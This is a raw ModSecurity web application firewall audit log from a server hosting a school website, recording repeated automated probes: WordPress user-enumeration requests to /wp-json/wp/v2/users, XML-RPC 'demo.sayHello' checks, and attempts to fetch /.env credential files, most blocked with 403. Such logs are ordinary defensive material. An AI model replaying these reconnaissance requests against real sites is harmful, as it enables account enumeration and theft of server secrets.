Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ffdb272-Z-- --00835564-A-- [18/May/2025:20:45:33 +0700] aCnkfUPRqak7bVuUS6d7eAAAAII 103.236.140.4 54312 103.236.140.4 8181 --00835564-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00835564-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00835564-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575933559534 3050 (- - -) Stopwatch2: 1747575933559534 3050; combined=1383, p1=469, p2=882, p3=0, p4=0, p5=31, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00835564-Z-- --86eca174-A-- [18/May/2025:20:45:33 +0700] aCnkfUPRqak7bVuUS6d7eQAAAJM 103.236.140.4 54314 103.236.140.4 8181 --86eca174-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --86eca174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86eca174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575933773670 2080 (- - -) Stopwatch2: 1747575933773670 2080; combined=1094, p1=309, p2=746, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86eca174-Z-- --5a91ae20-A-- [18/May/2025:20:45:39 +0700] aCnkg0PRqak7bVuUS6d7jgAAAIA 103.236.140.4 54466 103.236.140.4 8181 --5a91ae20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a91ae20-C-- demo.sayHello --5a91ae20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a91ae20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575939242891 5854 (- - -) Stopwatch2: 1747575939242891 5854; combined=4297, p1=546, p2=3519, p3=33, p4=36, p5=97, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a91ae20-Z-- --5bda6f1e-A-- [18/May/2025:20:45:39 +0700] aCnkgxir-GlPrFVVKe6WbgAAAFU 103.236.140.4 54468 103.236.140.4 8181 --5bda6f1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bda6f1e-C-- demo.sayHello --5bda6f1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bda6f1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575939312167 3760 (- - -) Stopwatch2: 1747575939312167 3760; combined=2712, p1=453, p2=2113, p3=17, p4=17, p5=65, sr=72, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bda6f1e-Z-- --ab6b3460-A-- [18/May/2025:20:46:26 +0700] aCnksvypzAd0elWOk7qZJQAAAA4 103.236.140.4 55454 103.236.140.4 8181 --ab6b3460-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.43.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.43.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab6b3460-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6b3460-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575986738734 2772 (- - -) Stopwatch2: 1747575986738734 2772; combined=1243, p1=523, p2=691, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6b3460-Z-- --8d74cd08-A-- [18/May/2025:20:54:37 +0700] aCnmnUPRqak7bVuUS6d_FwAAAI8 103.236.140.4 39828 103.236.140.4 8181 --8d74cd08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d74cd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d74cd08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747576477513049 3547 (- - -) Stopwatch2: 1747576477513049 3547; combined=1996, p1=588, p2=1374, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d74cd08-Z-- --247c8e3e-A-- [18/May/2025:20:54:45 +0700] aCnmpVewLfDrCkDGIGy4aAAAANc 103.236.140.4 39960 103.236.140.4 8181 --247c8e3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --247c8e3e-C-- demo.sayHello --247c8e3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --247c8e3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747576485555172 5807 (- - -) Stopwatch2: 1747576485555172 5807; combined=4491, p1=609, p2=3638, p3=32, p4=34, p5=103, sr=118, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247c8e3e-Z-- --16c76d5e-A-- [18/May/2025:21:07:33 +0700] aCnppVewLfDrCkDGIGy8OAAAANI 103.236.140.4 58668 103.236.140.4 8181 --16c76d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16c76d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c76d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577253855721 2537 (- - -) Stopwatch2: 1747577253855721 2537; combined=1445, p1=451, p2=962, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c76d5e-Z-- --34197906-A-- [18/May/2025:21:07:39 +0700] aCnpq0PRqak7bVuUS6eEwAAAAIs 103.236.140.4 58808 103.236.140.4 8181 --34197906-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34197906-C-- demo.sayHello --34197906-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34197906-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577259735292 5855 (- - -) Stopwatch2: 1747577259735292 5855; combined=4776, p1=605, p2=3928, p3=42, p4=44, p5=94, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34197906-Z-- --c6131667-A-- [18/May/2025:21:11:10 +0700] aCnqflewLfDrCkDGIGy9aQAAAMY 103.236.140.4 36294 103.236.140.4 8181 --c6131667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6131667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6131667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577470980225 2842 (- - -) Stopwatch2: 1747577470980225 2842; combined=1287, p1=415, p2=832, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6131667-Z-- --cff6eb04-A-- [18/May/2025:21:11:18 +0700] aCnqhhir-GlPrFVVKe6exQAAAEI 103.236.140.4 36486 103.236.140.4 8181 --cff6eb04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cff6eb04-C-- demo.sayHello --cff6eb04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff6eb04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577478479694 6424 (- - -) Stopwatch2: 1747577478479694 6424; combined=4869, p1=600, p2=4016, p3=32, p4=35, p5=109, sr=79, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff6eb04-Z-- --7d71db43-A-- [18/May/2025:21:11:29 +0700] aCnqkfypzAd0elWOk7qjzQAAAAw 103.236.140.4 36796 103.236.140.4 8181 --7d71db43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d71db43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d71db43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577489835047 2883 (- - -) Stopwatch2: 1747577489835047 2883; combined=1295, p1=428, p2=825, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d71db43-Z-- --fe08055e-A-- [18/May/2025:21:11:42 +0700] aCnqnkPRqak7bVuUS6eGNwAAAIY 103.236.140.4 37188 103.236.140.4 8181 --fe08055e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe08055e-C-- demo.sayHello --fe08055e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe08055e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577502011753 5584 (- - -) Stopwatch2: 1747577502011753 5584; combined=4002, p1=579, p2=3215, p3=33, p4=32, p5=84, sr=74, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe08055e-Z-- --0911e60b-A-- [18/May/2025:21:19:12 +0700] aCnsYPypzAd0elWOk7qnEgAAAAc 103.236.140.4 50264 103.236.140.4 8181 --0911e60b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.3.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.3.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0911e60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0911e60b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747577952122385 777 (- - -) Stopwatch2: 1747577952122385 777; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0911e60b-Z-- --8b855c47-A-- [18/May/2025:21:31:03 +0700] aCnvJ_ypzAd0elWOk7qsYQAAAAo 103.236.140.4 43132 103.236.140.4 8181 --8b855c47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.24.118.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.24.118.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b855c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b855c47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747578663543437 2784 (- - -) Stopwatch2: 1747578663543437 2784; combined=1278, p1=414, p2=835, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b855c47-Z-- --028d8602-A-- [18/May/2025:21:38:11 +0700] aCnw0_ypzAd0elWOk7qvgQAAAAQ 103.236.140.4 49858 103.236.140.4 8181 --028d8602-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --028d8602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --028d8602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747579091410130 734 (- - -) Stopwatch2: 1747579091410130 734; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --028d8602-Z-- --41f89838-A-- [18/May/2025:21:42:53 +0700] aCnx7fypzAd0elWOk7qvlQAAAAU 103.236.140.4 49910 103.236.140.4 8181 --41f89838-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.240.193.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.240.193.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --41f89838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f89838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579373651046 2887 (- - -) Stopwatch2: 1747579373651046 2887; combined=1301, p1=443, p2=828, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
